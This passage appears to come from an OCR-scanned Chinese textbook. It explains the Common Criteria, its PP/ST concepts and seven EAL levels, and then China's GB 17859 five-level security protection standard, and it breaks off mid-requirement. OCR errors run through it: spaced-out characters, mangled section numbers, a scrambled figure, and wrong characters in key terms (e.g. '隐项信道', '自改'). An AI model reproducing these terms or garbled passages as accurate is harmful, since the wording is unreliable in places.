CC 为 消费 者 提供 了 一 个 独立 于 实现 的 框架 ,命名 为 “保护 轮廓 ”"(PP) ,用 户 在 保护 轮廓 
里 表明 他 们 对 评估 对 象 中 IT 安全 措施 的 特殊 需求 。 


2. 开发 者 


CC 为 开发 者 在 准备 和 参与 评估 产品 或 系统 以 及 确定 每 种 产品 和 系统 要 满足 安全 需求 
方面 提供 支持 。 只 要 有 一 个 互相 认可 的 评价 方法 和 双方 对 评价 结果 的 认可 协议 ,CC 还 可 
以 在 准备 和 参与 对 开发 者 的 评估 对 象 (TOE) 评 价 方面 支持 除 TOE 开发 者 之 外 的 其 他 人 。 

CC 还 可 以 通过 评价 特殊 的 安全 功能 和 保证 来 证 明 TOE 确实 实现 了 特定 的 安全 需求 。 
每 一 个 TOE 的 需求 都 包含 在 一 个 名 为 “安全 目标 ”(ST) 的 概念 中 ,广泛 的 消费 者 基础 需求 
由 一 个 或 多 个 PP 提供 。 

CC 描述 一 个 包括 在 TOE 内 的 安全 功能 。 可 以 用 CC 来 决定 有 必要 支持 TOE 评估 证 
据 的 可 靠 性 和 作用 , 它 也 定义 证 据 的 内 容 和 表现 形式 。 


3. 评估 者 


当 要 做 出 TOE 及 其 安全 需求 一 致 性 判断 时 ,CC 为 评估 者 提供 了 评估 准则 。CC 描述 
了 评估 者 执行 的 系列 通用 功能 和 完成 这 些 功 能 所 需 的 安全 功能 。 


1422 CC 的 组 成 


CC 分 为 三 个 部 分 ,其 中 第 一 部 分 “简介 和 一 般 模 型 ”, 正 文 介绍 了 CC 中 的 有 关 术 语 、 基 
本 概念 和 一 般 模型 以 及 与 评估 有 关 的 一 些 框架 ,附录 部 分 主要 介绍 保护 轮廓 (PP) 和 安全 目 
标 (ST) 的 基本 内 容 。 

第 二 部 分 “安全 功能 要 求 ”, 按 “类 - 族 -组 件 ” 的 方式 提出 安全 功能 要 求 ,提供 了 表示 评估 
对 象 TOE 安全 功能 要 求 的 标准 方法 。 除 正文 以 外 ,每 一 个 类 还 有 对 应 的 提示 性 附录 做 进 
一 步 的 解释 。 

第 三 部 分 “安全 保证 要 求 ”, 定 义 了 评估 保证 级 别 ,建立 了 一 系列 安全 保证 组 建 作为 表示 
TOE 保证 要 求 的 标准 方法 。 第 三 部 分 列 出 了 一 系列 保证 组 件 、 族 和 类 ,还 定义 了 PP 和 ST 
的 评估 准则 ,并 提出 了 评估 保证 级 别 。 

CC 的 三 个 部 分 相互 依存 , 缺 一 不 可 。 其 中 第 一 部 分 是 介绍 CC 的 基本 概念 和 基本 原 
理 ,第 二 部 分 提出 了 技术 要 求 ,第 三 部 分 提出 了 非 技 术 要 求 和 对 开发 过 程 . 工 程 过 程 的 要 求 。 
这 三 部 分 的 有 机 结合 具体 体现 在 PP 和 ST 中 ,PP 和 ST 的 概念 和 原理 有 第 一 部 分 介绍 ,PP 
和 ST 中 的 安全 功能 要 求 和 安全 保证 要 求 在 第 二 、 第 三 部 分 选取 ,这 些 安全 要 求 的 完备 性 和 
一 致 性 ,由 第 二 、 第 三 两 个 部 分 来 保证 ,如 图 14-2 所 示 。 
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轮廓 PP 
二 月 (CCRARTO 包括 一 个 CC 评估 保证 级 的 
一 组 可 复 用 且 完备 的 
安 人 要求 


功能 包 
一 组 可 复 用 的 功能 要 求 ， 
为 构建 PP 或 ST 选取 输入 


安全 目标 ST 
包括 一 个 CC 评估 保证 级 的 


描述 TOE 的 一 组 完备 要 求 。 
可 包括 保护 轮廓 、 要 求 和 / 
或 其 他 非 CC 要 求 


评估 保证 级 1 


评估 保证 级 2 


选择 性 扩充 ( 非 CC) 
安全 要 求 


评估 保证 级 n 


图 14-2 CC 各 部 分 之 间 的 关系 


1423 评估 保证 级 别 EAL 


评估 保证 级 别 是 评估 保证 要 求 的 一 种 特定 组 合 ( 保 证 包 ) ,是 度量 保证 措施 的 一 个 尺度 ， 
这 种 尺度 的 确定 权衡 了 所 获得 的 保证 级 别 以 及 达到 该 保证 级 别 所 需 的 代价 和 可 能 性 。 

在 CC 中 定义 了 7 个 递增 的 评估 保证 级 ,这 种 递增 靠 蔡 换 成 同一 保证 子 类 中 的 一 个 更 
高 级 别 的 保证 组 件 (例如 添加 新 的 要 求 ) 来 实现 。 以 下 是 7 个 评估 保证 级 别 的 介绍 。 


1. EAL1: 功能 测试 


EAL1 适用 于 对 正确 运行 需要 一 定 信任 的 场合 ,但 在 该 场合 中 对 安全 的 威胁 应 视 为 并 
不 严重 ; 还 适用 于 需要 独立 的 保证 来 支持 “认为 在 人 员 获 信息 的 保护 方面 已 经 给 予 足够 的 
重视 ”这 一 情形 。 该 级 别 依据 一 个 独立 性 测试 和 对 所 提供 指导 性 文档 的 检查 来 为 用 户 评估 
TOE( 评 估 对 象 ) 。 

在 该 级 别 上 ,没有 TOE 开发 者 的 帮助 也 能 成 功 地 进行 评估 ,并 且 所 需 费 用 也 最 少 。 通 
过 该 级 别 的 评估 ,可 以 确信 TOE 的 功能 与 其 文档 在 形式 上 是 一 致 的 ,并 且 对 已 标识 的 威胁 
提供 了 有 效 的 保护 。 
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2. EAL2: 结构 测试 


EAL2 要 求 开 发 者 递交 设计 信息 和 测试 结果 ,但 不 需要 开发 者 增加 过 多 的 费用 或 时 间 
的 投入 。 

EAL2 适用 于 以 下 情况 : 在 缺乏 现成 可 用 的 完整 的 开发 记录 时 ,开发 者 或 用 户 需 要 一 
种 低 到 中 等 级 别 的 独立 保证 的 安全 性 ,例如 对 传统 的 保密 系统 进行 评估 或 者 不 便于 对 开发 
者 进行 现场 核查 时 。 

EAL2 通过 以 下 的 因素 来 提供 支持 : 对 TOE 安全 功能 的 独立 性 测试 ,开发 者 基于 功能 
规范 进行 测试 得 到 的 证 据 ,对 开发 者 测试 结果 选择 的 独立 确认 ,功能 强度 分 析 , 开 发 者 针对 
明显 脆弱 性 查找 到 的 证 据 。EAL2 还 通过 一 个 对 TOE 的 配置 列表 和 安全 分 发 过 程 的 证 据 
来 提供 保证 。 

EAL2 在 EAL1 的 基础 上 有 意识 地 增加 了 保证 ,这 是 通过 对 开发 者 测试 的 需要 、 脆 弱 性 
分 析 和 基于 更 详细 的 TOE 规范 的 独立 性 测试 来 实现 的 。 


3. EAL3: 方法 测试 和 校 验 


在 不 需要 对 现 有 的 合理 的 开发 规则 进行 实质 性 改进 的 情况 下 ,EAL3 可 使 开发 者 在 设 
计 阶 段 能 从 正确 的 安全 工程 中 获得 最 大 限度 的 保证 。 

EAL3 适用 于 以 下 情况 : 开发 者 或 用 户 需 要 一 个 中 等 级 别 的 独立 保证 的 安全 性 ,并 在 
不 带 来 大 量 的 再 构建 费用 的 情况 下 ,对 TOE 及 其 开发 过 程 进行 彻底 审查 。 

开展 该 级 的 评估 ,需要 分 析 基 于 * 灰 盒子 "的 测试 结果 、 开 发 者 测试 结果 的 选择 性 独立 确 
认 、 开 发 者 搜索 已 知 脆弱 性 的 证 据 等 。 还 要 求 使 用 开发 环境 控制 措施 .TOE 的 配置 管理 和 
安全 交付 程序 。 

EAL3 在 EAL2 的 基础 上 有 意识 地 增加 了 保证 ,这 是 通过 要 求 更 完备 的 安全 功能 、 机 制 
和 /或 过 程 的 测试 范围 ,以 提供 TOE 在 开发 中 不 会 被 自 改 的 一 些 信 任 来 实现 的 。 


4. EAL4: 系统 地 设计 ,测试 和 评审 


基于 良好 而 严格 的 商业 开发 规则 ,在 不 需 额外 增加 大 量 专 业 知 识 ,技巧 和 其 他 资源 的 情 
况 下 ,开发 者 从 正确 的 安全 工程 中 所 获得 的 保证 级 别 最 高 可 达到 EAL4。 在 现 有 条 件 下 ,只 
对 一 个 已 经 存在 的 生产 线 进行 改进 时 ,EAL4 是 所 能 达到 的 最 高 级 别 。 

EAL4 适用 于 以 下 情况 : 开发 者 或 用 户 对 传统 的 商品 化 的 TOE 需要 一 个 中 等 到 高 等 
级 别 的 独立 保证 的 安全 性 ,并 准备 负担 额外 的 安全 专用 工程 费用 。 

开展 该 级 的 评估 ,需要 分 析 TOE 模块 的 底层 设计 和 实现 的 子 集 。 在 测试 方面 将 侧重 
于 对 已 知 脆弱 性 进行 独立 的 搜索 。 开 发 控制 方面 涉及 生命 周期 模型 .开发 工具 标识 和 自动 
化 配置 管理 等 方面 。 

EAL4 在 EAL3 基础 上 有 意识 地 增加 了 保证 ,这 是 通过 要 求 更 多 的 设计 描述 、 实 现 的 一 
个 子 集 、 改 进 的 机 制 和 /或 能 提供 TOE 不 会 在 开发 和 分 发 过 程 中 被 自 改 的 信任 的 过 程 来 实 
现 的 。 
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5. EAL5: 半 形 式 化 设计 和 测试 


适当 应 用 专业 性 的 一 些 安全 工程 技术 ,并 基于 严格 的 商业 开发 实践 ,EAL5 可 使 开发 者 
从 安全 工程 中 获得 最 大 限度 的 保证 。 如 果 某 个 TOE 要 想 达到 EAL5 的 要 求 , 开 发 者 需要 
在 设计 和 开发 方面 下 一 定 工夫 ,但 如 果 具 备 相关 的 一 些 专业 技术 ,也 许 额外 的 开销 不 会 
很 大 。 

EAL5 适用 于 以 下 情况 : 开发 者 和 使 用 者 在 有 计划 的 开发 中 ,采用 严格 的 开发 手段 ,以 
获得 一 个 高 级 别 的 独立 保证 的 安全 性 需要 ,但 不 会 因 采 取 专 业 性 安全 工程 技术 而 增加 一 些 
不 合理 的 开销 。 

开展 该 级 别 的 评估 ,需要 分 析 所 有 的 实现 。 还 需要 额外 分 析 功 能 规范 和 高 层 设计 的 形 
式 化 模型 和 半 形 式 化 表示 ,以 及 它们 之 间 对 应 的 半 形 式 化 论证 。 在 对 已 知 脆弱 性 的 搜索 方 
面 ,必须 确保 TOE 可 抵御 中 等 攻击 潜力 的 穿 透 性 攻击 者 。 还 要 求 采取 隐蔽 信道 分 析 和 模 
块 化 的 TOE 设计 。 

EAL5 在 EAL4 的 基础 上 有 意识 地 增加 了 保证 ,这 是 通过 要 求 半 形式 化 的 设计 描述 、 整 
个 实现 ,更 结构 化 ( 且 可 分 析 ) 的 体系 、 隐 项 信道 分 析 \ 改 进 的 机 制 和 能 够 相信 TOE 将 不 会 
在 开发 中 被 算 改 的 过 程 来 实现 的 。 


6. EAL6: 半 形 式 化 验证 的 设计 和 测试 


EAL6 允许 开发 者 通过 在 一 个 严格 的 开发 环境 中 使 用 安全 工程 技术 来 获得 高 度 保证 ， 
以 便 生产 一 个 优异 的 TOE 来 保护 高 价值 的 资源 避免 重大 的 风险 。 所 以 EAL6 适用 于 以 下 
情况 : 安全 TOE 的 开发 应 用 于 高 风险 的 地 方 ,在 这 里 所 保护 的 资源 值得 花费 额外 开销 。 

EAL6 通过 对 安全 功能 的 分 析 来 提供 保证 , 它 靠 功 能 的 完整 接口 的 一 个 规范 、 指 导 性 文 
档 、TOE 的 高 层 和 低层 设计 和 实现 的 结构 化 表示 来 理解 安全 行为 。 通 过 以 下 方式 获得 额外 
保证 : TOE 的 安全 策略 的 形式 化 模型 ,功能 规范 的 半 形 式 化 表示 ,高层 设计 和 低层 设计 和 
它们 之 间 的 对 应 关系 的 一 个 半 形 式 化 阐明 。 此 外 还 需要 一 个 模块 化 的 分 层 的 TOE 设计 。 

EAL6 通过 以 下 的 因素 来 提供 支持 : TOE 安全 功能 的 独立 性 测试 ,基于 功能 规范 的 开 
发 者 测试 的 证 据 , 高 层 设 计 和 低层 设计 ,对 开发 者 测试 结果 进行 选择 性 的 独立 确认 ,功能 强 
度 分 析 ,开发 者 搜索 脆弱 性 的 证 据 。 

EAL6 也 通过 结构 化 的 开发 流程 的 使 用 、 开 发 环境 的 控制 ,包括 完全 自动 化 的 全 面 的 
TOE 配置 管理 .安全 分 发 过 程 的 证 据 等 来 提供 保证 。 

EAL6 在 EAL5 的 基础 上 有 意识 地 增加 了 保证 ,这 是 通过 要 求 更 全 面 的 分 析 、 实 现 的 一 
个 结构 化 表示 、 更 构造 化 的 结构 (如 分 层 ) 、 更 全 面 的 独立 脆弱 性 分 析 、 系 统 性 隐蔽 信道 说 明 
和 改进 了 的 配置 管理 和 开发 环境 控制 来 实现 的 。 


7. EAL7: 形式 化 验证 的 设计 和 测试 


EAL7 适用 于 在 极端 高 风险 的 形势 下 ,并 且 所 保护 的 资源 价值 极 高 ,值得 花费 更 高 的 开 
销 进行 安全 TOE 的 开发 。EAL7 实际 应 用 于 那些 需要 进行 广泛 地 形式 化 分 析 安 全 功能 的 
TOE。EAL7 通过 对 安全 功能 的 分 析 来 提供 保证 , 它 靠 功能 的 和 完整 接口 的 规范 .指导 性 文 
档 、TOE 的 高 层 和 低层 设计 ,实现 的 结构 化 表示 来 理解 安全 行为 。 也 可 以 通过 以 下 方式 额 
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外 地 获得 保证 :; TOE 安全 策略 的 形式 化 模型 ,功能 规范 的 形式 化 表示 和 高 层 设 计 , 低 层 设 
计 的 半 形 式 化 表示 ,以 及 它们 之 间 的 对 应 关系 的 适当 的 形式 化 和 半 形 式 化 阐明 。 此 外 还 需 
要 一 个 模块 化 的 .分 层 的 和 简单 的 TOE 设计 。 

EAL7 通过 由 以 下 的 因素 来 提供 支持 : TOE 安全 功能 的 独立 性 测试 ,基于 功能 规范 高 
层 设计 的 开发 者 测试 的 证 据 , 低 层 实 际 和 实现 表示 ,开发 者 测试 结果 的 完整 的 独立 确认 , 功 
能 强度 分 析 , 开 发 者 搜索 脆弱 性 的 证 据 等 。 

EAL7 也 通过 结构 化 的 开发 流程 的 使 用 .开发 环境 的 控制 .包括 完全 自动 化 的 全 面 的 
TOE 配置 管理 .安全 分 发 过 程 的 证 据 等 来 提供 保证 。 

EAL7 在 EAL6 的 基础 上 有 意识 地 增加 了 保证 ,这 是 通过 要 求 使 用 形式 化 表示 和 形式 
化 对 应 的 更 全 面 的 分 析 和 全 面 的 测试 来 实现 的 。 


1424 CC 的 特点 


CC 比 起 早期 的 评估 准则 其 特点 体现 在 其 结构 的 开放 性 、 表 达 方 式 的 通用 性 以 及 结构 
和 表达 方式 的 内 在 完备 性 和 实用 性 等 四 个 方面 。 

在 结构 的 开放 性 方面 ,CC 提出 的 安全 功能 要 求 和 安全 保证 要 求 都 可 以 具体 的 保护 轮 
廓 和 安全 目标 中 进一步 细 化 和 扩展 。 如 可 以 增加 “备份 和 恢复 ”方面 的 功能 要 求 或 一 些 环境 
安全 要 求 。 这 种 开放 式 的 结构 更 适应 信息 技术 和 信息 安全 技术 的 发 展 。 

通用 性 的 特点 , 即 给 出 通用 的 表达 方式 。 如 果 用 户 、 开 发 者 .评估 者 和 认可 者 等 目标 用 
户 都 使 用 CC 的 语言 ,互相 之 间 就 更 容易 理解 沟通 。 如 果 用 户 使 用 CC 的 语言 表述 自己 的 安 
全 需求 ,开发 者 就 可 以 有 针对 性 地 描述 产品 和 系统 的 安全 性 ,评估 者 也 更 容易 有 效 客观 地 进 
行 评估 ,并 确保 评估 结果 多 用 户 而 言 更 容易 理解 。 这 种 特点 对 规范 实用 方案 的 编写 和 安全 
性 测试 评估 都 具有 重要 意义 。 这 种 特点 也 是 在 经 济 全 球 化 发 展 、 全 球 信息 化 发 展 的 趋势 下 ， 
进行 合格 评定 和 评估 结果 国际 互 认 的 需要 。 

CC 的 这 种 结构 和 表达 方式 具有 内 在 完备 性 和 实用 性 的 特点 ,具体 体现 在 保护 轮廓 和 
安全 目标 的 编制 上 。 保 护 轮廓 主要 用 于 表达 一 类 产品 或 系统 的 用 户 需 求 ,在 标准 化 体系 中 
可 以 作为 安全 技术 类 标准 对 待 。 其 内 容 主 要 包括 : 对 该 类 产品 或 系统 的 界定 性 描述 , 即 确 
定 需要 保护 的 对 象 ; 确定 安全 环境 , 即 指明 安全 问题 (需要 保护 的 资产 .已 知 的 威胁 用户 的 
组 织 安全 策略 ); 产品 或 系统 的 安全 目的 , 即 对 安全 问题 的 相应 对 策 ( 技 术 性 和 非 技术 性 措 
施 ); 信息 技术 安全 要 求 ,包括 功能 要 求 、 保 证 要 求 和 环境 要 求 ,这 些 要 求 通过 满足 安全 目 
的 ,进一步 提出 具体 在 技术 上 如 何 解 决 安全 问题 ; 基本 原理 ,指明 安全 要 求 对 安全 目的 、 安 
全 目的 对 安全 环境 是 充分 且 必 要 的 ; 以 及 附加 的 补充 说 明 信 息 。 

保护 轮廓 编制 ,一 方面 解决 了 技术 与 实际 需求 之 间 的 内 在 完备 性 ; 另 一 方面 用 户 通过 
分 析 所 需要 的 产品 和 系统 面临 的 安全 问题 ,明确 所 需 的 安全 策略 ,进而 确定 应 采取 的 安全 措 
施 , 包 括 技术 和 管理 上 的 措施 ,这 样 就 有 助 于 提高 安全 保护 的 针对 性 和 有 效 性 。 

安全 目标 在 保护 轮廓 的 基础 上 ,通过 将 安全 要 求 进一步 有 针对 性 地 具体 化 ,解决 了 要 求 
的 具体 实现 。 通 过 保护 轮廓 和 安全 目标 这 两 种 结构 ,就 便于 将 CC 的 安全 性 要 求 具体 应 用 
到 IT 产品 的 开发 .生产 、 测 试 . 评 估 和 信息 系统 的 集成 .运行 .评估 和 管理 中 。 
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143 我 国信 息 系 统 安全 评价 标准 


为 了 提高 我 国 计 算 机 信息 系统 安全 保护 水 平 ,以 确保 社会 政治 稳定 和 经 济 建设 的 顺利 
进行 ,公安 部 提出 并 组 织 制定 了 强制 性 国家 标准 GB 17859: 1999《 计 算 机 信息 安全 保护 等 
级 划分 准则 》, 该 准则 于 1999 年 9 月 13 日 经 国家 质量 技术 监督 局 发 布 , 并 于 2001 年 1 月 1 
日 起 实施 。 该 标准 是 建立 安全 等 级 保护 制度 .实施 安全 等 级 管理 的 重要 基础 性 标准 。 它 将 
计算 机 信息 系统 安全 保护 等 级 划分 为 5 个 级 别 ,通过 规范 .科学 和 公正 的 评定 和 监督 管理 ， 
一 是 为 计算 机 信息 系统 安全 等 级 保护 管理 法 规 的 制定 和 执法 部 门 的 监督 检查 提供 依据 ; 二 
是 为 计算 机 信息 系统 安全 产品 的 研制 提供 技术 支持 ; 三 是 为 安全 系统 的 建设 和 管理 提供 技 
术 指 导 。 之 后 ,公安 部 于 2002 年 7 月 18 日 还 公布 并 实施 了 一 系列 计算 机 信息 系统 安全 等 
级 保护 标准 ,包括 GA/T 390 一 2002《 计 算 机 信息 系统 安全 等 级 保护 通用 技术 要 求 》,.GA/T 
388 一 2002《 计 算 机 信息 系统 安全 等 级 保护 操作 系统 技术 要 求 ),.GA/T 389 一 2002《 计 算 机 信 
息 系统 安全 等 级 保护 数据 库 管理 系统 技术 要 求 》.GA/T 387 一 2002 计 算 机 信息 系统 安全 等 
级 保护 网 络 技术 要 求 》GA/VT 391 一 2002《 计 算 机 信息 系统 安全 等 级 保护 管理 要 求 ) 等 , 进 一 
步 完 善 了 计算 机 信息 系统 安全 等 级 保护 的 标准 体系 。 


14.3.1 所 涉及 的 术语 


在 公安 部 制定 的 信息 系统 安全 评价 标准 中 ,为 了 清晰 地 阐述 标准 的 详细 内 容 , 定 义 了 一 
系列 基本 术语 。 这 些 术语 与 TCSEC 中 的 相关 术语 基本 相似 。 

(1) 计算 机 信息 系统 (Computer Information System) : 计算 机 信息 系统 是 由 计算 机 及 
其 相关 的 和 配套 的 设备 .设施 ( 含 网 络 ) 构 成 的 ,按照 一 定 的 应 用 目标 和 规则 对 信息 进行 采 
集 . 加 工 、 存 储 、 传 输 、 检 索 等 处 理 的 人 机 系统 。 

(2) 计算 机 信息 系统 可 信 计 算 基 (Trusted Computing Base of Computer Information 
System) : 计算 机 系统 内 保护 装置 的 总 体 , 包 括 硬件 .固件 .软件 和 负责 执行 安全 策略 的 组 合 
体 。 它 建立 了 一 个 基本 的 保护 环境 并 提供 一 个 可 信 计 算 系 统 所 要 求 的 附加 用 户 服务 。 

(3) 客体 (Object) : 信息 的 载体 。 

(4) 主体 (Subject) : 引起 信息 在 客体 之 间 流 动 的 人 、 进 程 或 设备 等 。 

(5) 敏感 标记 (Sensitivity Label) : 表示 客体 安全 级 别 并 描述 客体 数据 敏感 性 的 一 组 信 
息 ,可 信 计 算 基 中 把 敏感 标记 作为 强制 访问 控制 决策 的 依据 。 

(6) 安全 策略 (Security Policy): 有 关 管 理 . 保 护 和 发 布 敏感 信息 的 法 律 . 规 定 和 实施 
细则 。 

(7) 信道 CChannel) : 系统 内 的 信息 传输 路 径 。 

(8) 隐 项 信道 (Covert Channel) : 允许 进程 以 危害 系统 安全 策略 的 方式 传输 信息 的 通 
信 信 道 。 

(9) 访问 监控 器 (Reference Monitor) : 监控 主体 和 客体 之 间 授权 访问 关系 的 部 件 。 

(10) 可 信 信 道 CTrusted Channel) : 为 了 执行 关键 的 安全 操作 ,在 主体 、 客 体 及 可 信 IT 
产品 之 间 建 立 和 维护 的 保护 通信 数据 免 遭 修改 和 泄露 的 通信 和 路径 。 
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(11) 客体 重用 : 在 计算 机 信息 系统 可 信 计 算 基 的 空闲 存储 客体 空间 中 ,对 客体 初始 制 
定 ,分 配 或 再 分 配 一 个 主体 之 前 ,撤销 该 客体 所 含 信息 的 所 有 授权 。 当 主体 获得 对 一 个 已 被 
释放 的 客体 的 访问 权时 ,当前 主体 不 能 获得 原 主体 活动 所 产生 的 任何 信息 。 


1432 等 级 的 划分 及 各 等 级 的 要 求 


《计算 机 信息 系统 安全 保护 等 级 划分 准则 ) 将 信息 系统 划分 为 5 个 等 级 ,分 别 是 自主 保 
护 级 、 系 统 审 计 保护 级 ,安全 标记 保护 级 ,结构 化 保护 级 和 访问 验证 保护 级 。 主 要 的 安全 考 
核 指 标 自主 访问 控制 ,强制 访问 控制 .安全 标记 、 身 份 鉴 别 、 客 体重 用 审计、 数据 完整 性 、 隐 
蔽 信道 分 析 、` 可 信 路 径 和 可 信 恢 复 等 ,这 些 指标 涵盖 了 不 同 级 别 的 安全 要 求 。 


1. 第 一 级 用 户 自主 保护 级 


本 级 的 计算 机 信息 系统 可 信 计 算 基 通过 隔离 用 户 与 数据 ,使 用 户 具备 自主 安全 保护 的 
能 力 。 它 具有 多 种 形式 的 控制 能 力 , 对 用 户 实施 访问 控制 , 即 为 用 户 提供 可 行 的 手段 ,保护 
用 户 和 用 户 组 信息 ,避免 其 他 用 户 对 数据 的 非法 读 写 与 破坏 。 本 级 有 以 下 考核 指标 的 要 求 。 

1) 自主 访问 控制 

计算 机 信息 系统 可 信 计 算 基 定义 和 控制 系统 中 命名 用 户 对 命名 客体 的 访问 。 实 施 机 制 
(例如 访问 控制 表 ) 允 许 命名 用 户 以 用 户 和 (或 ) 用 户 组 的 身份 规定 并 控制 客体 的 共享 ; 阻止 
非 授权 用 户 读 取 敏感 信息 。 

2) 身份 鉴别 

计算 机 信息 系统 可 信 计 算 基 初始 执行 时 ,首先 要 求 用 户 标识 自己 的 身份 ,并 使 用 保护 机 
制 (例如 口令 ) 来 鉴别 用 户 的 身份 ,阻止 非 授 权 用 户 访问 用 户 身份 鉴别 数据 。 

3) 数据 完整 性 

计算 机 信息 系统 可 信 计 算 基 通过 自主 完整 性 策略 ,阻止 非 授 权 用 户 修改 或 破坏 敏感 
言 息 。 


2. 第 二 级 ”系统 审计 保护 级 


与 用 户 自主 保护 级 相 比 ,本 级 的 计算 机 信息 系统 可 信 计 算 基 实施 了 粒度 更 细 的 自主 访 
问 控制 , 它 通 过 登录 规程 .审计 安全 性 相关 事件 和 隔离 资源 ,使 用 户 对 自己 的 行为 负责 。 本 
级 有 以 下 考核 指标 的 要 求 。 

1) 自主 访问 控制 

计算 机 信息 系统 可 信 计 算 基 定义 和 控制 系统 中 命名 用 户 对 命名 客体 的 访问 。 实 施 机 制 
(例如 访问 控制 表 ) 允 许 命名 用 户 以 用 户 和 (或 ) 用 户 组 的 身份 规定 并 控制 客体 的 共享 ; 阻止 
非 授权 用 户 读 取 敏感 信息 ,并 控制 访问 权限 扩散 。 自 主 访问 控制 机 制 根 据 用 户 指定 方式 或 
默认 方式 ,阻止 非 授权 用 户 访问 客体 ,访问 控制 的 粒度 是 单个 用 户 , 没 有 存 取 权 的 用 户 只 允 
许 由 授权 用 户 指定 对 客体 的 访问 权 。 

2) 身份 鉴别 

计算 机 信息 系统 可 信 计 算 基 初始 执行 时 ,首先 要 求 用 户 标识 自己 的 身份 ,并 使 用 保护 机 
制 (例如 口令 ) 来 鉴别 用 户 的 身份 ; 阻止 非 授权 用 户 访问 用 户 身份 鉴别 数据 。 通 过 为 用 户 提 
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供 唯 一 标识 .计算机 信息 系统 可 信 计 算 基 能 够 使 用 户 对 自己 的 行为 负责 。 计 算 机 信息 系统 
可 信 计 算 基 还 具备 将 身份 标识 与 该 用 户 所 有 可 审计 行为 相关 联 的 能 力 。 

3) 客体 重用 

在 计算 机 信息 系统 可 信 计 算 基 的 空闲 存储 客体 空间 中 ,对 客体 初始 指定 、 分 配 或 再 分 配 
一 个 主体 之 前 ,撤销 该 客体 所 含 信息 的 所 有 授权 。 当 主体 获得 对 一 个 已 被 释放 的 客体 的 访 
问 权 时 ,当前 主体 不 能 获得 原 主体 活动 所 产生 的 任何 信息 。 

4) 审计 

计算 机 信息 系统 可 信 计算 基 能 创建 和 维护 受 保护 客体 的 访问 审计 跟踪 记录 ,并 能 阻止 
非 授权 的 用 户 对 它 访问 或 破坏 。 

计算 机 信息 系统 可 信 计 算 基 能 记录 下 述 事件 : 使 用 身份 鉴别 机 制 ; 将 客体 引入 用 户 地 
址 空间 (例如 ,打开 文件 ,程序 初始 化 ); 删除 客体 ; 由 操作 员 、 系 统管 理 员 或 (和 ) 系 统 安全 
管理 员 实施 的 动作 ,以 及 其 他 与 系统 安全 有 关 的 事件 。 对 于 每 一 事件 ,其 审计 记录 包括 : 事 
件 的 日 期 和 时 间 、 用 户 、 事 件 类 型 事件 是 否 成 功 。 对 于 身份 鉴别 事件 ,审计 记录 包含 的 来 源 
(例如 终端 标识 符 ); 对 于 客体 引入 用 户 地 址 空间 的 事件 及 客体 删除 事件 ,审计 记录 包含 客 
体 名 。 

对 不 能 由 计算 机 信息 系统 可 信 计 算 基 独立 分 辨 的 审计 事件 ,审计 机 制 提供 审计 记录 接 
口 , 可 由 授权 主体 调用 。 这 些 审 计 记录 区 别 于 计算 机 信息 系统 可 信 计 算 基 独 立 分 辨 的 审计 
记录 。 

5) 数据 完整 性 

计算 机 信息 系统 可 信 计 算 基 通过 自主 完整 性 策略 ,阻止 非 授权 用 户 修改 或 破坏 敏感 
这 息 。 


3. 第 三 级 ”安全 标记 保护 级 


本 级 的 计算 机 信息 系统 可 信 计 算 基 具有 系统 审计 保护 级 所 有 功能 。 此 外 ,还 提供 有 关 
安全 策略 模型 数据 标记 以 及 主体 对 客体 强制 访问 控制 的 非 形 式 化 描述 ; 具有 准确 地 标记 
输出 信息 的 能 力 ; 消除 通过 测试 发 现 的 任何 错误 。 本 级 有 以 下 考核 指标 的 要 求 。 

1) 自主 访问 控制 

计算 机 信息 系统 可 信 计 算 基 定 义 和 控制 系统 中 命名 用 户 对 命名 客体 的 访问 。 实 施 机 制 
(例如 访问 控制 表 ) 允许 命 名 用 户 以 用 户 和 (或 ) 用 户 组 的 身份 规定 并 控制 客体 的 共享 ; 阻止 
非 授权 用 户 读 取 敏感 信息 。 并 控制 访问 权限 扩散 。 自 主 访问 控制 机 制 根据 用 户 指定 方式 或 
默认 方式 ,阻止 非 授权 用 户 访问 客体 。 访 问 控制 的 粒度 是 单个 用 户 。 没 有 存 取 权 的 用 户 只 
允许 由 授权 用 户 指定 对 客体 的 访问 权 。 阻 止 非 授权 用 户 读 取 敏 感 信息 。 

2) 强制 访问 控制 

计算 机 信息 系统 可 信 计 算 基 对 所 有 主体 及 其 所 控制 的 客体 (例如 ,进程 文件. 段 . 设 备 ) 
实施 强制 访问 控制 。 为 这 些 主体 及 客体 指定 敏感 标记 ,这 些 标记 是 等 级 分 类 和 非 等 级 类 别 
的 组 合 ,它们 是 实施 强制 访问 控制 的 依据 。 计 算 机 信息 系统 可 信 计 算 基 支持 两 种 或 两 种 以 
上 成 分 组 成 的 安全 级 。 计 算 机 信息 系统 可 信 计 算 基 控制 的 所 有 主体 对 客体 的 访问 应 满足 : 
仅 当 主体 安全 级 中 的 等 级 分 类 高 于 或 等 于 客体 安全 级 中 的 等 级 分 类 , 且 主 体 安全 级 中 的 非 
等 级 类 别 包含 了 客体 安全 级 中 的 全 部 非 等 级 类 别 ,主体 才能 读 客 体 ; 仅 当 主体 安全 级 中 的 
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等 级 分 类 低 于 或 等 于 客体 安全 级 中 的 等 级 分 类 , 且 主 体 安全 级 中 的 非 等 级 类 别 包 含 了 客体 
安全 级 中 的 非 等 级 类 别 , 主 体 才 能 写 一 个 客体 。 计 算 机 信息 系统 可 信 计 算 基 使 用 身份 和 鉴 
别 数据 ,鉴别 用 户 的 身份 ,并 保证 用 户 创建 的 计算 机 信息 系统 可 信 计 算 基 外 部 主体 的 安全 级 
和 授权 受 该 用 户 的 安全 级 和 授权 的 控制 。 

3) 标记 

计算 机 信息 系统 可 信 计 算 基 应 维护 与 主体 及 其 控制 的 存储 客体 (例如 ,进程 .文件 . 段 、 
设备 ) 相 关 的 敏感 标记 。 这 些 标 记 是 实施 强制 访问 的 基础 。 为 了 输入 未 加 安全 标记 的 数据 ， 
计算 机 信息 系统 可 信 计 算 基 向 授权 用 户 要 求 并 接受 这 些 数据 的 安全 级 别 , 且 可 由 计算 机 信 
息 系 统 可 信 计 算 基 审计 。 

4) 身份 鉴别 

计算 机 信息 系统 可 信 计 算 基 初始 执行 时 ,首先 要 求 用 户 标识 自己 的 身份 ,而 且 , 计 算 机 
信息 系统 可 信 计 算 基 维护 用 户 身份 识别 数据 并 确定 用 户 访问 权 及 授权 数据 。 计 算 机 信息 系 
统 可 信 计 算 基 使 用 这 些 数据 鉴别 用 户 身份 ,并 使 用 保护 机 制 (例如 口令 ) 来 鉴别 用 户 的 身份 ; 
